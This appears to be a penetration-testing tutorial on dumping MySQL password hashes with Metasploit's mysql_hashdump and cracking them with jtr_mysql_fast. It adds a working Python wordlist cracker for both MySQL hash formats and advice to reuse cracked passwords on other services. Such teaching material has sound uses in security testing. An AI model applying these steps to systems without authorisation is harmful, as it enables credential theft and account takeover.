Dump MySQL Password Hashes
mysql_hashdump extracts the usernames and password hashes from the mysql.user table of a MySQL
server (the hashes are hashed, not encrypted, which is why they can be cracked offline). You can
then use the jtr_mysql_fast module to crack them. The module is located in
auxiliary/scanner/mysql. To use it, set the RHOSTS option to your target's IP address and raise the
THREADS value if you are scanning more than one host. The module has to log in to read
mysql.user, so it needs valid credentials: set USERNAME and PASSWORD to an account that can read
that table, which in practice means root or another privileged account you have already recovered
(for example with mysql_login). Each dumped account is stored as loot in user:hash form, which is
what the cracking module reads.
Cracking passwords with John The Ripper
Metasploit offers the module jtr_mysql_fast (auxiliary/analyze/jtr_mysql_fast). It runs John the
Ripper against the hashes acquired by the mysql_hashdump module to identify weak passwords. John
the Ripper is free and Open Source password-cracking software, available for many operating
systems such as Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix
passwords, but it also understands both MySQL hash formats: the 16-hex-digit hash of MySQL
versions before 4.1 (John's "mysql" format) and the 41-character hash beginning with "*" used from
MySQL 4.1 on, which is SHA1(SHA1(password)) (John's "mysql-sha1" format). After acquiring the
MySQL hashes with mysql_hashdump, load the jtr_mysql_fast module and run it. It picks the hashes up
from the Metasploit database where mysql_hashdump stored them, so a database connection is
required and both modules must be run in the same workspace.
This module offers options such as a custom path to the john binary (JOHN_PATH). The option that
will interest you most is Wordlist, which makes John use a custom password list; a list tailored
to the target (default credentials, company and product names, passwords from earlier findings)
cracks far more than a generic one. Leave it unset and the module falls back on its own built-in
list, seeded with names and credentials already in the database. Any MySQL password you crack is
worth trying against the host's other services, because database passwords are frequently reused
for application and operating-system accounts.
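The following script is an added example, not code from Metasploit or John the Ripper. It shows what jtr_mysql_fast asks John to do with the user:hash loot that mysql_hashdump saves: work out which MySQL hash format each entry uses, hash every wordlist entry with that algorithm, and compare. It goes a little beyond the page by also handling the edge cases a real dump contains (accounts with an empty password, and hashes from authentication plugins John's two MySQL formats do not cover). The loot lines and wordlist are constructed for the example; the root entry is the well-known hash of the password "password", and the pre-4.1 entry is generated with the script's own port of OLD_PASSWORD() because no such server is available here.

```python
import hashlib
import re

# Added example, not code from Metasploit or John the Ripper. Sample data
# below is constructed for the example, not taken from a real server.

NATIVE_RE = re.compile(r"^\*[0-9A-Fa-f]{40}$")   # MySQL 4.1+ (John format mysql-sha1)
OLD_RE = re.compile(r"^[0-9A-Fa-f]{16}$")        # pre-4.1 (John format mysql)


def mysql_native_hash(password: str) -> str:
    """MySQL 4.1+ PASSWORD(): '*' + uppercase hex of SHA1(SHA1(password))."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def mysql_old_hash(password: str) -> str:
    """Pre-4.1 OLD_PASSWORD(), ported from hash_password() in MySQL's sql/password.c.
    Spaces and tabs are skipped; only the low 31 bits of each accumulator are
    kept, so Python's unbounded ints give the same result as the C ulong maths."""
    nr, add, nr2 = 1345345333, 7, 0x12345671
    for b in password.encode("utf-8"):
        if b in (0x20, 0x09):
            continue
        nr ^= (((nr & 63) + add) * b) + (nr << 8)
        nr2 += (nr2 << 8) ^ nr
        add += b
    return "%08x%08x" % (nr & 0x7FFFFFFF, nr2 & 0x7FFFFFFF)


def classify(stored: str) -> str:
    """Name the format of one stored hash so the matching algorithm is used."""
    if stored == "":
        return "empty"          # account with no password at all
    if NATIVE_RE.match(stored):
        return "mysql-sha1"
    if OLD_RE.match(stored):
        return "mysql"
    return "unsupported"        # e.g. caching_sha2_password ('$A$005$...') on MySQL 8


def parse_hashdump(text: str):
    """Parse the user:hash lines that mysql_hashdump saves as loot."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        user, _, stored = line.partition(":")
        entries.append((user, stored))
    return entries


def crack(text: str, wordlist):
    """Return {user: (format, plaintext or None)} for every dumped account."""
    entries = parse_hashdump(text)
    formats = {classify(h) for _, h in entries}
    # Hash the wordlist once per format present, not once per account.
    lookup = {}
    if "mysql-sha1" in formats:
        lookup.update({mysql_native_hash(w): w for w in wordlist})
    if "mysql" in formats:
        lookup.update({mysql_old_hash(w): w for w in wordlist})
    results = {}
    for user, stored in entries:
        fmt = classify(stored)
        if fmt == "mysql-sha1":
            results[user] = (fmt, lookup.get(stored.upper()))
        elif fmt == "mysql":
            results[user] = (fmt, lookup.get(stored.lower()))
        elif fmt == "empty":
            results[user] = (fmt, "")   # logs in with an empty password
        else:
            results[user] = (fmt, None)
    return results


# Constructed loot in mysql_hashdump's user:hash layout: the hash of "password",
# a 4.1+ hash whose plaintext is not in the wordlist, a pre-4.1 hash built with
# mysql_old_hash above, an empty password, and a placeholder MySQL 8 plugin hash.
SAMPLE_LOOT = "\n".join([
    "root:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19",
    "backup:*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B",
    "legacy:" + mysql_old_hash("secret"),
    "guest:",
    "app:$A$005$notarealcachingsha2hash",
])
WORDLIST = ["123456", "password", "secret", "mysql", "admin"]

if __name__ == "__main__":
    for user, (fmt, plain) in crack(SAMPLE_LOOT, WORDLIST).items():
        if fmt == "empty":
            status = "no password set"
        elif fmt == "unsupported":
            status = "hash format not handled"
        else:
            status = repr(plain) if plain is not None else "not cracked"
        print(f"{user:8s} {fmt:12s} {status}")
```

The "unsupported" branch is the caveat worth remembering: servers running MySQL 8 default to caching_sha2_password, whose "$A$005$" hashes are neither of John's MySQL formats, so jtr_mysql_fast will simply skip them and you will need a different cracker mode for those accounts.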